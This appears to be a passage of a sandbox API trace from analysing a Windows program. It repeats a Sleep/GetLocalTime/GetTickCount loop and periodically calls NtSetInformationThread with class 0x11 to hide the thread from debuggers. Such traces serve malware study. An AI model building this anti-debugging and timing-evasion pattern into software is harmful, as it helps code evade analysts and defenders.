Sleep (dwMilliseconds=0x3e8) [0199.032] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x35f)) [0199.032] GetTickCount () returned 0x1d84524 [0199.032] Sleep (dwMilliseconds=0x3e8) [0199.035] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x362)) [0199.035] GetTickCount () returned 0x1d8490b [0199.035] Sleep (dwMilliseconds=0x3e8) [0199.036] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x363)) [0199.036] GetTickCount () returned 0x1d84cf2 [0199.037] Sleep (dwMilliseconds=0x3e8) [0199.042] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x369)) [0199.042] GetTickCount () returned 0x1d850e8 [0199.043] Sleep (dwMilliseconds=0x3e8) [0199.044] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x36b)) [0199.044] GetTickCount () returned 0x1d854cf [0199.045] Sleep (dwMilliseconds=0x3e8) [0199.046] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x36d)) [0199.046] GetTickCount () returned 0x1d858b6 [0199.046] Sleep (dwMilliseconds=0x3e8) [0199.052] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x373)) [0199.053] GetTickCount () returned 0x1d85c9d [0199.053] Sleep (dwMilliseconds=0x3e8) [0199.055] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x376)) [0199.055] GetTickCount () returned 0x1d86094 [0199.055] Sleep (dwMilliseconds=0x3e8) [0199.058] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x379)) [0199.062] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0199.062] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0199.062] GetCurrentThread () returned 0xfffffffe [0199.062] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0199.063] GetTickCount () returned 0x1d8647b [0199.063] Sleep (dwMilliseconds=0x3e8) [0199.065] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x380)) [0199.065] GetTickCount () returned 0x1d86862 [0199.065] Sleep (dwMilliseconds=0x3e8) [0199.067] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x382)) [0199.067] GetTickCount () returned 0x1d86c49 [0199.067] Sleep (dwMilliseconds=0x3e8) [0199.071] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x386)) [0199.071] GetTickCount () returned 0x1d8703f [0199.071] Sleep (dwMilliseconds=0x3e8) [0199.163] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x3d9)) [0199.163] GetTickCount () returned 0x1d87474 [0199.163] Sleep (dwMilliseconds=0x3e8) [0199.215] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x25)) [0199.215] GetTickCount () returned 0x1d8788a [0199.215] Sleep (dwMilliseconds=0x3e8) [0199.270] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x5c)) [0199.270] GetTickCount () returned 0x1d87cb0 [0199.270] Sleep (dwMilliseconds=0x3e8) [0199.273] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x5f)) [0199.273] GetTickCount () returned 0x1d88097 [0199.273] Sleep (dwMilliseconds=0x3e8) [0199.275] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x61)) [0199.275] GetTickCount () returned 0x1d8847e [0199.275] Sleep (dwMilliseconds=0x3e8) [0199.277] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x63)) [0199.277] GetTickCount () returned 0x1d88865 [0199.277] Sleep (dwMilliseconds=0x3e8) [0199.278] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x64)) [0199.280] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0199.280] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0199.281] GetCurrentThread () returned 0xfffffffe [0199.281] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0199.281] GetTickCount () returned 0x1d88c4c [0199.281] Sleep (dwMilliseconds=0x3e8) [0199.286] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x6c)) [0199.286] GetTickCount () returned 0x1d89042 [0199.286] Sleep (dwMilliseconds=0x3e8) [0199.288] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x6e)) [0199.288] GetTickCount () returned 0x1d89429 [0199.288] Sleep (dwMilliseconds=0x3e8) [0199.291] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x71)) [0199.291] GetTickCount () returned 0x1d89810 [0199.291] Sleep (dwMilliseconds=0x3e8) [0199.295] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x75)) [0199.295] GetTickCount () returned 0x1d89bf7 [0199.295] Sleep (dwMilliseconds=0x3e8) [0199.296] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x76)) [0199.297] GetTickCount () returned 0x1d89fee [0199.297] Sleep (dwMilliseconds=0x3e8) [0199.298] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x78)) [0199.298] GetTickCount () returned 0x1d8a3d5 [0199.298] Sleep (dwMilliseconds=0x3e8) [0199.300] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x7a)) [0199.300] GetTickCount () returned 0x1d8a7bc [0199.300] Sleep (dwMilliseconds=0x3e8) [0199.301] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x7b)) [0199.301] GetTickCount () returned 0x1d8aba3 [0199.303] Sleep (dwMilliseconds=0x3e8) [0199.304] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x7e)) [0199.304] GetTickCount () returned 0x1d8af8a [0199.304] Sleep (dwMilliseconds=0x3e8) [0199.306] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x80)) [0199.306] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0199.307] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0199.308] GetCurrentThread () returned 0xfffffffe [0199.308] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0199.309] GetTickCount () returned 0x1d8b371 [0199.310] Sleep (dwMilliseconds=0x3e8) [0199.314] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x88)) [0199.314] GetTickCount () returned 0x1d8b767 [0199.314] Sleep (dwMilliseconds=0x3e8) [0199.317] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x8b)) [0199.317] GetTickCount () returned 0x1d8bb4e [0199.317] Sleep (dwMilliseconds=0x3e8) [0199.319] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x8d)) [0199.319] GetTickCount () returned 0x1d8bf35 [0199.319] Sleep (dwMilliseconds=0x3e8) [0199.321] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x8f)) [0199.321] GetTickCount () returned 0x1d8c31c [0199.321] Sleep (dwMilliseconds=0x3e8) [0199.325] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x93)) [0199.325] GetTickCount () returned 0x1d8c703 [0199.325] Sleep (dwMilliseconds=0x3e8) [0199.327] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x95)) [0199.327] GetTickCount () returned 0x1d8caea [0199.327] Sleep (dwMilliseconds=0x3e8) [0199.328] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x96)) [0199.329] GetTickCount () returned 0x1d8cee1 [0199.329] Sleep (dwMilliseconds=0x3e8) [0199.330] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x98)) [0199.330] GetTickCount () returned 0x1d8d2c8 [0199.331] Sleep (dwMilliseconds=0x3e8) [0199.332] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x9a)) [0199.334] GetTickCount () returned 0x1d8d6af [0199.334] Sleep (dwMilliseconds=0x3e8) [0199.335] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x9d)) [0199.336] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0199.336] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0199.337] GetCurrentThread () returned 0xfffffffe [0199.337] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0199.337] GetTickCount () returned 0x1d8da96 [0199.337] Sleep (dwMilliseconds=0x3e8) [0199.340] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0xa2)) [0199.340] GetTickCount () returned 0x1d8de7d [0199.340] Sleep (dwMilliseconds=0x3e8) [0199.344] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0xa6)) [0199.344] GetTickCount () returned 0x1d8e274 [0199.344] Sleep (dwMilliseconds=0x3e8) [0199.481] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x12f)) [0199.481] GetTickCount () returned 0x1d8e6d7 [0199.481] Sleep (dwMilliseconds=0x3e8) [0199.534] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x164)) [0199.534] GetTickCount () returned 0x1d8eafd [0199.535] Sleep (dwMilliseconds=0x3e8) [0199.540] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x16a)) [0199.540] GetTickCount () returned 0x1d8eee4 [0199.540] Sleep (dwMilliseconds=0x3e8) [0199.542] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x16c)) [0199.542] GetTickCount () returned 0x1d8f2cb [0199.542] Sleep (dwMilliseconds=0x3e8) [0199.543] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x16d)) [0199.543] GetTickCount () returned 0x1d8f6b2 [0199.543] Sleep (dwMilliseconds=0x3e8) [0199.545] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x16f)) [0199.545] GetTickCount () returned 0x1d8fa99 [0199.545] Sleep (dwMilliseconds=0x3e8) [0199.547] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x171)) [0199.547] GetTickCount () returned 0x1d8fe8f [0199.547] Sleep (dwMilliseconds=0x3e8) [0199.549] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x174)) [0199.550] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0199.551] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0199.551] GetCurrentThread () returned 0xfffffffe [0199.551] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0199.551] GetTickCount () returned 0x1d90276 [0199.551] Sleep (dwMilliseconds=0x3e8) [0199.553] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x177)) [0199.553] GetTickCount () returned 0x1d9065d [0199.553] Sleep (dwMilliseconds=0x3e8) [0199.556] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x17a)) [0199.556] GetTickCount () returned 0x1d90a44 [0199.557] Sleep (dwMilliseconds=0x3e8) [0199.561] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x17f)) [0199.561] GetTickCount () returned 0x1d90e2b [0199.561] Sleep (dwMilliseconds=0x3e8) [0199.562] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x180)) [0199.563] GetTickCount () returned 0x1d91222 [0199.563] Sleep (dwMilliseconds=0x3e8) [0199.565] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x183)) [0199.566] GetTickCount () returned 0x1d91609 [0199.566] Sleep (dwMilliseconds=0x3e8) [0199.570] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x188)) [0199.571] GetTickCount () returned 0x1d919f0 [0199.571] Sleep (dwMilliseconds=0x3e8) [0199.572] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x18a)) [0199.573] GetTickCount () returned 0x1d91dd7 [0199.573] Sleep (dwMilliseconds=0x3e8) [0199.574] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x18c)) [0199.574] GetTickCount () returned 0x1d921be [0199.574] Sleep (dwMilliseconds=0x3e8) [0199.576] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x18e)) [0199.576] GetTickCount () returned 0x1d925a5 [0199.576] Sleep (dwMilliseconds=0x3e8) [0199.580] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x192)) [0199.581] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0199.581] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0199.581] GetCurrentThread () returned 0xfffffffe [0199.581] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0199.581] GetTickCount () returned 0x1d9299c [0199.581] Sleep (dwMilliseconds=0x3e8) [0199.583] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x195)) [0199.583] GetTickCount () returned 0x1d92d83 [0199.583] Sleep (dwMilliseconds=0x3e8) [0199.586] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x198)) [0199.586] GetTickCount () returned 0x1d9316a [0199.590] Sleep (dwMilliseconds=0x3e8) [0199.591] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x19d)) [0199.591] GetTickCount () returned 0x1d93551 [0199.591] Sleep (dwMilliseconds=0x3e8) [0199.593] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x19f)) [0199.593] GetTickCount () returned 0x1d93938 [0199.593] Sleep (dwMilliseconds=0x3e8) [0199.595] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1a1)) [0199.595] GetTickCount () returned 0x1d93d2e [0199.595] Sleep (dwMilliseconds=0x3e8) [0199.596] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1a2)) [0199.596] GetTickCount () returned 0x1d94115 [0199.596] Sleep (dwMilliseconds=0x3e8) [0199.601] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1a7)) [0199.601] GetTickCount () returned 0x1d944fc [0199.601] Sleep (dwMilliseconds=0x3e8) [0199.603] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1a9)) [0199.603] GetTickCount () returned 0x1d948e3 [0199.603] Sleep (dwMilliseconds=0x3e8) [0199.604] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1aa)) [0199.604] GetTickCount () returned 0x1d94cca [0199.604] Sleep (dwMilliseconds=0x3e8) [0199.606] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1ac)) [0199.606] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0199.606] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0199.607] GetCurrentThread () returned 0xfffffffe [0199.607] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0199.608] GetTickCount () returned 0x1d950b1 [0199.608] Sleep (dwMilliseconds=0x3e8) [0199.610] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1b0)) [0199.610] GetTickCount () returned 0x1d954a8 [0199.610] Sleep (dwMilliseconds=0x3e8) [0199.616] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1b6)) [0199.616] GetTickCount () returned 0x1d9588f [0199.616] Sleep (dwMilliseconds=0x3e8) [0199.619] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1b9)) [0199.619] GetTickCount () returned 0x1d95c76 [0199.619] Sleep (dwMilliseconds=0x3e8) [0199.621] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1bb)) [0199.621] GetTickCount () returned 0x1d9605d [0199.621] 